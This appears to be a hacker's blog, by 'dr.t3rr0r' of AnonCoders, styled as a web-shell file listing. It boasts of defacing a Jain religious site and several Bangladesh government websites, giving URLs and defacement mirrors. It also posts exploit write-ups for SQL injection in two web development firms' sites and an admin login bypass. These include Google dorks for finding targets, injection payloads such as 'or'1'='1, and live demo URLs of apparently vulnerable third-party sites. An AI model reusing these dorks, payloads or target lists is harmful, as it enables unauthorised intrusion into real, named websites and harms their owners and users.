dr.t3rr0r
Official Website


today : | at : | safemode : ON
> / home / terror / public_html /
name author perms com modified label

Official Jain Samaj Religious Website Got Hacked dr.t3rr0r rwxr-xr-x 0 2:44 AM

Filename Official Jain Samaj Religious Website Got Hacked
Permission rw-r--r--
Author dr.t3rr0r
Date and Time 2:44 AM
Label
Action
dr.t3rr0r
Defaced ScreenShot dr.t3rr0r
::: Official Jain Samaj Religious Website Got Hacked :::

Site : http://jainsamaj.org
Mirror : http://www.hack-mirror.com/259729.html

Xsosys Technology Web Development Sql Injection Vulnerablity dr.t3rr0r rwxr-xr-x 0 2:38 AM

Filename Xsosys Technology Web Development Sql Injection Vulnerablity
Permission rw-r--r--
Author dr.t3rr0r
Date and Time 2:38 AM
Label
Action
[#] Exploit Title : Xsosys Technology Web Development Sql Injection

Vulnerablity



[#] Exploit Author : dr.t3rr0r ( AnonCoders )



[#] Vendor Homepage : http://www.xsosys.com/



[#] Google Dork : Powered by Xsosys inurl:php?id=



[#] Date: 2015-08-02



[#] Tested On : Windows , Linux



=========================================================



[+] Severity Level          :- High





[+] Request Method(s)       :- GET / POST





[+] Vulnerable Parameter(s) :- id





[+] Affected Area(s)        :- Entire admin, database, Server







[+] POC                     :- http://127.0.0.1/XXX.php?page=[SQL]'





The sql Injection web vulnerability can be be exploited by remote

attackers without any privilege of web-application user account or

user interaction.





[#] Demos :



http://www.gaiascience.com.mm/show_event.php?id=21'



http://www.gaiascience.com.sg/show_content.php?id=26'



http://www.gaialifeinternational.com/show_content.php?id=23'





[#] Greetz To : AnonCoders Team



[#] Discovered by : dr.t3rr0r
 
 
Exploit4Arab 

Falcon Breeze Development Sql Injection Vulnerablity dr.t3rr0r rwxr-xr-x 0 2:37 AM

Filename Falcon Breeze Development Sql Injection Vulnerablity
Permission rw-r--r--
Author dr.t3rr0r
Date and Time 2:37 AM
Label
Action
[#] Exploit Title : Falcon Breeze Development Sql Injection Vulnerablity



[#] Exploit Author : dr.t3rr0r ( AnonCoders )



[#] Vendor Homepage : http://www.falconbreeze.com



[#] Google Dork : intext:"Developing in Progress by Falcon Breeze."



[#] Date: 2015-08-02



[#] Tested On : Windows , Linux



=========================================================



[+] Severity Level          :- High





[+] Request Method(s)       :- GET / POST





[+] Vulnerable Parameter(s) :- id





[+] Affected Area(s)        :- Entire admin, database, Server







[+] POC                     :- http://127.0.0.1/XXX.php?page=[SQL]'



The sql Injection web vulnerability can be be exploited by remote

attackers without any privilege of web-application user account or

user interaction.



Error is Like Below.

Warning: mysql_fetch_object(): supplied argument is not a valid MySQL

result resource in /home/falconbr/public_html/files/new_detail.php on

line 16



[#] Demos :



http://www.ama.org.mm/index.php?page=postdetail&id=7'



http://www.falconbreeze.com/index.php?page=detail&new=133'





[#] Greetz To : AnonCoders Team



[#] Discovered by : dr.t3rr0r
 
 
Exploit4Arab 

Maurya Consultancy Services Bypass Admin Page Vulnerability dr.t3rr0r rwxr-xr-x 0 8:28 PM

Filename Maurya Consultancy Services Bypass Admin Page Vulnerability
Permission rw-r--r--
Author dr.t3rr0r
Date and Time 8:28 PM
Label
Action
[#] Exploit Title : Maurya Consultancy Services Bypass Admin Page Vulnerability



[#] Exploit Author : dr.t3rr0r ( AnonCoders )



[#] Vendor Homepage : http://www.mcslinc.com/



[#] Google Dork : intext:"Design by mcslinc.com"



[#] Date: 2015-08-02



[#] Tested On : Windows , Linux







[#] And then choose a target and put this after url : /admin/login.php







[#] And fill username and password like the information below :



[#] Username : 'or'1'='1



[#] Password : 'or'1'='1







[#] Demos :



http://gretdhara.com/admin/login.php



http://dhanshreemultitrade.com/admin/login.php



[#] Greetz To : AnonCoders Team



[#] Discovered by : dr.t3rr0r
 
 
Source : Exploit4Arab

Ashrayan Project Database of Bangladesh Government Website dr.t3rr0r rwxr-xr-x 0 9:41 AM

Filename Ashrayan Project Database of Bangladesh Government Website
Permission rw-r--r--
Author dr.t3rr0r
Date and Time 9:41 AM
Label
Action
Ashrayan Project Database of Bangladesh Government Website Hacked by dr.t3rr0r

Site : http://ashrayandbpmo.gov.bd/pages/page/
Mirror : http://www.zone-h.org/mirror/id/24492222

Official Website of Industrial Police of Bangladesh Government dr.t3rr0r rwxr-xr-x 0 9:09 AM

Filename Official Website of Industrial Police of Bangladesh Government
Permission rw-r--r--
Author dr.t3rr0r
Date and Time 9:09 AM
Label
Action
:: Official Site of Industrial Police of Bangladesh Government Website Has been Hacked
by dr.t3rr0r ::

Site : http://industrialpolice.gov.bd/act_and_rules.php
Mirror : http://www.zone-h.org/mirror/id/24492021

Ministry of Road and Transport of Bangladesh Government Website dr.t3rr0r rwxr-xr-x 0 4:53 AM

Filename Ministry of Road and Transport of Bangladesh Government Website
Permission rw-r--r--
Author dr.t3rr0r
Date and Time 4:53 AM
Label
Action
Ministry of Road and Transport of Bangladesh Government Website Hacked by dr.t3rr0r

Site : http://www.rhd.gov.bd/Feedback/upload/index.html
Mirror : http://www.hack-mirror.com/216602.html
 

Template © IT is Unknown! Use To Learn ! Learn to Hack ! Hack to Learn ! Hack to Use ! | by dr.t3rr0r |
VB (Vio b374k) Template design by dr.t3rr0r